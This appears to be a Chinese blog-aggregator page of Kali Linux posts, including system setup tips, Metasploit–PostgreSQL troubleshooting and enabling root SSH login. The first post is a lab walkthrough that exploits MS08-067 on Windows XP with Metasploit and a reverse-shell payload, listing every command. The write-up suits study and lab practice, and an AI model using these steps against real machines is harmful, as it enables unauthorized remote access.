2019-06-14 11:29:37 qq_44110340 阅读数 400
  • Kali Linux渗透测试基础入门到进阶实战全程课

    1、课程概要       本专栏主要分享Kali Linux渗透测试基础入门到进阶实战全程课! 2、课程目标      本课程致力于帮助大家掌握Kali Linux渗透测试基础与实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看和学习! 4、特别提醒         本课程支持一次购买,永久观看,请广大学员放心选购!

    706 人正在学习 去看看 林晓炜

实验环境
kali linux2.0
win-xp sp3

操作步骤
1.在kali linux 命令行执行

msfconsole		#打开msf控制台

在这里插入图片描述
2.查询ms08067漏洞

search ms08-067

在这里插入图片描述
3.使用exploit/windows/smb/ms08_067_netapi 并查看options

use exploit/windows/smb/ms08_067_netapi		
show options

在这里插入图片描述
4.使用拿shell的payload

show payload											#查看所有payload

在这里插入图片描述
5.

set payload windows/shell_reverse_tcp						#选择反弹shell

set rhosts 192.168.135.124                                  #设置目标主机IP

set lhost 192.168.135.138                     		        #设置本地主机IP

6.选择目标型号

show targets 									#查看可攻击机型
set target  34									#选择34

在这里插入图片描述
7.最后查看options
在这里插入图片描述
8直接运行

run						#利用payload

在这里插入图片描述
看到以上即试验成功。

2015-08-21 23:56:00 weixin_30414155 阅读数 9
  • Kali Linux渗透测试基础入门到进阶实战全程课

    1、课程概要       本专栏主要分享Kali Linux渗透测试基础入门到进阶实战全程课! 2、课程目标      本课程致力于帮助大家掌握Kali Linux渗透测试基础与实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看和学习! 4、特别提醒         本课程支持一次购买,永久观看,请广大学员放心选购!

    706 人正在学习 去看看 林晓炜

1.Kali Linux 2.0 发布下载,基于 Debian 的 Linux 发行版  http://www.linuxidc.com/Linux/2015-08/121549.htm

2.

Kali Linux解决 GPG错误 KEYEXPIRED 1425567400  http://www.linuxidc.com/Linux/2015-04/115852.htm

Ubuntu上安装Kali Linux的工具 http://www.linuxidc.com/Linux/2014-08/105866.htm

KaLi Linux中文指南 PDF  http://www.linuxidc.com/Linux/2015-01/112346.htm

3.

  1. 用Live U盘安装Kali Linux http://www.linuxidc.com/Linux/2014-05/102209.htm
  2. 硬盘安装Kali Linux http://www.linuxidc.com/Linux/2014-05/102207.htm
  3. 加密安装Kli Linux http://www.linuxidc.com/Linux/2014-05/102208.htm
  4. Kali Linux安装之Kali和Windows双引导 http://www.linuxidc.com/Linux/2014-05/102210.htm
  5. 下载Kali Linux http://www.linuxidc.com/Linux/2014-05/102204.htm

4.

转载于:https://www.cnblogs.com/yaolei/p/4749337.html

2015-01-13 09:45:26 xhbck 阅读数 719
  • Kali Linux渗透测试基础入门到进阶实战全程课

    1、课程概要       本专栏主要分享Kali Linux渗透测试基础入门到进阶实战全程课! 2、课程目标      本课程致力于帮助大家掌握Kali Linux渗透测试基础与实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看和学习! 4、特别提醒         本课程支持一次购买,永久观看,请广大学员放心选购!

    706 人正在学习 去看看 林晓炜

Kali Linux 装好系统后安装常用软件

2014-08-10 16:13
1.配置软件源 
leafpad /etc/apt/source.list

or(recommand):
#官方源
deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free

#激进源,新手不推荐使用这个软件源
deb http://repo.kali.org/kali kali-bleeding-edge main
deb-src http://repo.kali.org/kali kali-bleeding-edge main

#中科大kali源
deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free

#阿里云kali源
deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib
deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free


#aptitude 与apt-get 的区别可参考 http://blog.chinaunix.net/uid-10697776-id-3085807.html
aptitude update && aptitude full-upgrade   

2.解决LC_CTYPE,LC_ALL的设置问题
perl: warning: Setting locale failed.
    perl: warning: Please check that your locale settings:
    LANGUAGE = “en_US.UTF-8″,
    LC_ALL = “en_US.UTF-8″,
    LANG = “en_US.UTF-8″
    are supported and installed on your system.
    perl: warning: Falling back to the standard locale (“C”).
    locale: Cannot set LC_CTYPE to default locale: No such file or directory
    locale: Cannot set LC_MESSAGES to default locale: No such file or directory
    locale: Cannot set LC_ALL to default locale: No such file or directory
参考:http://bookmarks.honewatson.com/2009/05/30/perl-warning-please-check-that-your-locale-settings-ubuntu/

apt-get install language-pack-en-base

export LANGUAGE=en_US.UTF-8
export LANG=en_US.UTF-8
export LC_ALL=en_US.UTF-8
locale-gen en_US.UTF-8
dpkg-reconfigure locales

3.安装QQ
下载alsa-lib-1.0.26.tar.bz2
wget ftp://ftp.alsa-project.org/pub/lib/alsa-lib-1.0.26.tar.bz2
然后解压
tar -jxvf alsa-lib-1.0.26.tar.bz2
c.最后编译安装:
cd alsa-lib-1.0.26
./configure
make && make install

dpkg --add-architecture i386   ####移出 i386: dpkg --remove-architecture i386
apt-get install  -y ia32-libs libnotify-bin ia32-libs-gtk libnotify-bin
wget http://www.longene.org/download/WineQQ2013SP6-20140102-Longene.deb
dpkg -i WineQQ2013SP6-20140102-Longene.deb


/usr/bin/qq:行69: /opt/longene/qq/longene_gtk: 没有那个文件或目录
解决方法:
apt-get install -y ia32-libs 

dpkg -i --force-overwrite /var/cache/apt/archives/libasound2_1.0.25-4_i386.deb
libgtk-x11-2.0.so.0  : No such file or directory
/opt/longene/qq/longene_gtk: error while loading shared libraries: libgtk-x11-2.0.so.0: cannot open shared object file: No such file or directory
apt-get install libgtk-x11-2.0
http://forum.ubuntu.org.cn/viewtopic.php?t=155354
apt-get install apt-file
apt-file search libGL.so.1
apt-get install ia32-libs-gtk  (OK)  


4.安装eclipe及pydev,django
可参考 http://blog.csdn.net/allen_zhao_2012/article/details/7988389
apt-get install -y eclipse
默认安装的  eclipse plugins 路径为: /usr/lib/eclipse/

下载pydev
wget http://downloads.sourceforge.net/project/pydev/pydev/PyDev%203.2.0/PyDev%203.2.0.zip?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fpydev%2Ffiles%2Fpydev%2FPyDev%25203.2.0%2F&ts=1407645058&use_mirror=cznic

unzip PyDev\ 3.2.0.zip
cp -r fautures /usr/lib/eclipse/
cp -r plugins /usr/lib/eclipse/

安装 django:
curl https://bootstrap.pypa.io/ez_setup.py -o - | python
apt-get install -y apache2 libapache2-mod-wsgi mysql-server python-mysqldb
下载 django:  #下载页面  https://www.djangoproject.com/download/
wget https://www.djangoproject.com/download/1.6.5/tarball/
tar -zxvf Django-1.6.5.tar.gz
cd Django-1.6.5
python setup.py install

打开eclipse
Windows → Preferences → PyDev → Python Interpreters → 
(可以Auto config也可手动)
Interpreter name: Python 2.73  
Interpreter Executable: /usr/bin/python2.7
/usr/bin/python2.7


5.安装fcitx中文输入法
 apt-get install -y fcitx fcitx-pinyin fcitx-module-cloudpinyin fcitx-googlepinyin im-config 
im-config 
再将默认的输入法改成fcitx,保存即可

6.激活VPN连接
默认安装,是没有激活VPN的,能看到VPN选项,但是不能天际VPN连接
apt-get install -y pptpd network-manager-openvpn network-manager-openvpn-gnome network-manager-pptp network-manager-pptp-gnome network-manager-strongswan network-manager-vpnc  network-manager-vpnc-gnome 


7.安装libreoffice
apt-get install -y libreoffice

解决libreoffice中文显示方框:
fonts 安装字体:
apt-get install -y ttf-arphic-uming ttf-wqy-zenhei ttf-wqy-microhei ttf-arphic-ukai 
从C:/Windows/Fonts 中复制
simfang.ttf和simsun.ttc 到  /usr/share/fonts/
打开libreoffice
libreoffice ->tools->options->libre write ->basic fonts   
将字体改为  simsun
 

8. 安装java 1.7
#可在这里查看版本列表  http://www.oracle.com/technetwork/java/javase/documentation/7u-relnotes-515228.html
#下载地址 http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html
wget  http://download.oracle.com/otn-pub/java/jdk/7u67-b01/jdk-7u67-linux-x64.tar.gz
tar -zxvf jdk-7u67-linux-x64.tar.gz
cd jdk1.7.0_67/
mkdir /usr/local/java/jdk1.7.0_67
cp -r ./* /usr/local/java/jdk1.7.0_67
vi /etc/profile 加入:
export JAVA_HOME=/usr/local/java/jdk1.7.0_67
export JRE_HOME=/usr/local/java/jdk1.7.0_67/jre
export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$CLASSPATH
export PATH=$JAVA_HOME:$PATH
source /etc/profile
#检查
java -version 


9.安装新得立软件管理和邮件客户端
apt-get install -y synaptic 
apt-get install -y gnome-tweak-tool gdebi flashplugin-nofree icedove 


10.Linux 备份
tar cvpzf backup.tgz --exclude=/proc --exclude=/lost+found --exclude=/backup.tgz --exclude=/mnt --exclude=/sys --exclude=/media /

http://blog.csdn.net/dai451954706/article/details/38470567
2015-01-05 23:06:00 weixin_30394981 阅读数 7
  • Kali Linux渗透测试基础入门到进阶实战全程课

    1、课程概要       本专栏主要分享Kali Linux渗透测试基础入门到进阶实战全程课! 2、课程目标      本课程致力于帮助大家掌握Kali Linux渗透测试基础与实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看和学习! 4、特别提醒         本课程支持一次购买,永久观看,请广大学员放心选购!

    706 人正在学习 去看看 林晓炜

kali linux 系列教程之metasploit 连接postgresql可能遇见的问题

文/玄魂

 

目录

kali linux metasploit 连接postgresql可能遇见的问题................................ 1

前言............................................................................................................... 1

理想状态....................................................................................................... 1

手动连接....................................................................................................... 1

从零开始....................................................................................................... 1

 原文链接:http://www.xuanhun521.com/Blog/a2f56ff2-70e2-49e6-96f4-a29c03a743c2

前言

由于kali linux的版本不同,默认情况下对metasploitpostgresql的配置也不相同,导致我们启动metasploit后连接postgresql数据库会遇到无法连接的情况。下面就三种情况,简单的给大家描述一下,以及遇到问题的解决方案。

理想状态

理想情况下,只需要两步即可。

1.      启动postgresql

service postgresql start

2.      启动mestasploit

service metasploit start

metasploit中输入db_status查看数据库连接状态,为已连接。

手动连接

当启动metasploit后,发现并没有自动连接postgresql数据库时,需要手动连接。

连接的命令为 db_connect 用户名:密码@ip/数据库名。实际情况可能是:

msf>db_connect msf3:toor@localhost/msf3

那么到哪里去找用户名和密码呢?

打开这个文件:/opt/metasploit/apps/pro/ui/config/database.yml

文件内容可能如下:

development:
adapter: postgresql
database: "msf3"
username: "msf3"
password: "zFhyomTtRt4P8ZF868KUyhmKvqQkvjE"
host: localhost
port: 5432
pool: 5
timeout: 5

在上面示例的配置文件中我们能看到数据库名称,用户名和密码,把这几个选项替换到上面的db_connect命令中就可以了。

从零开始

如果你的运气确实不佳的话,发现连database.yml文件都找不到的话,千万不要灰心,老天想让你多学点东西而已。

首先打开终端,确保postgresql服务已经启动,然后切换当前账户到postgre账户。

su postgres

第二步,输入如下命令创建一个postgresql数据库账户。

create user msf3 –P

命令中的msf3就是要创建的用户,当然你可以输入任何其他用户名。

接着,终端中会提示你输入密码,然后确认密码,这里我设置密码为“msf”

然后询问你该账户的权限,输入y或者n都无所谓。

第三步,创建数据库。

createdb --owner=msf3 msf3

owner参数指定数据库的所有者,这里为msf3,最后一个参数为数据库名称,这里也设置为msf3

第四部,输入exit退出当前用户,回到root上下文中。回到手动连接的步骤

root@kali: msfconsole

msf > db_connect msf3:msf@localhost/msf3

恭喜你,成功了。如果还有其他问题,欢迎在QQ群中找我,共同交流。

ps:对此文章感兴趣的读者,可以加qq群:Hacking:303242737(已满);Hacking-2群:147098303Hacking-3群:31371755hacking-4:201891680;Hacking-5群:316885176

 

 

转载于:https://www.cnblogs.com/xuanhun/p/4204825.html

2019-08-07 10:57:35 gaogaogaopipi 阅读数 45
  • Kali Linux渗透测试基础入门到进阶实战全程课

    1、课程概要       本专栏主要分享Kali Linux渗透测试基础入门到进阶实战全程课! 2、课程目标      本课程致力于帮助大家掌握Kali Linux渗透测试基础与实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看和学习! 4、特别提醒         本课程支持一次购买,永久观看,请广大学员放心选购!

    706 人正在学习 去看看 林晓炜

Kali Linux操作系统属于Debian

root@kali:~# uname -a
Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali1 (2018-01-08) x86_64 GNU/Linux
root@kali:~#

Kali Linux默认应该都已经安装了ssh,如果没有ssh,可以使用以下命令进行安装;

root@kali:~# apt-get install ssh
  Kali Linux启用、停用ssh,使用以下命令;

root@kali:~# /etc/init.d/ssh start
[ ok ] Starting ssh (via systemctl): ssh.service.
root@kali:~#
root@kali:~# /etc/init.d/ssh stop
[ ok ] Stopping ssh (via systemctl): ssh.service.
root@kali:~#
  启用ssh后,如果还不能ssh登录kali,请检查配置文件配置项是否正确

root@kali:~# more /etc/ssh/sshd_config

以下两项解除注释,并按下述配置
PermitRootLogin yes
PasswordAuthentication yes

没有更多推荐了,返回首页